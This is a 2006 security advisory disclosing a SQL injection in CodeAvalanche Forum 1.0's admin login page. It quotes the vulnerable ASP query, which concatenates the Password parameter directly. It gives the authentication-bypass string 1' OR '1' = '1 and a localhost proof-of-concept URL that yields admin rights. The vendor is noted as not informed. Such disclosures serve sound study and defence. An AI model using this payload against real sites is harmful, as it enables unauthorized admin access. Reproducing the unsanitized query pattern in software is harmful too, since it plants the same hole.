------------------------------------------------------------------
               - CAForum 1.0 Remote SQL Injection -
   -= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

      -= CodeAvalanche Forum Version 1.0 =-



Omnipresent
june 01, 2006


Vunerability(s):
----------------
SQL Injection



Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php


Description of product:
-----------------------

CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your
visitors. Administrator can add unlimited number of forum categories.


Vulnerability / Exploit:
------------------------

In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack.
A malicious people can gain Admin rights by putting rights parameters in the Password Variable.

Let's Check the source code:

<% Response.Buffer = True 


userLogged=false
If Request("Password")<>"" Then 
'response.Write(Request("Password")) 
'response.flush

dim rsUser,selectSQL
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[...]



[End default.asp]

As you can see the variable Password is not properly sanitized before be used, so an attacker can put this string in the
password field:


1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'


And you can gain access to the application with admin rights.


PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:


http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@email.it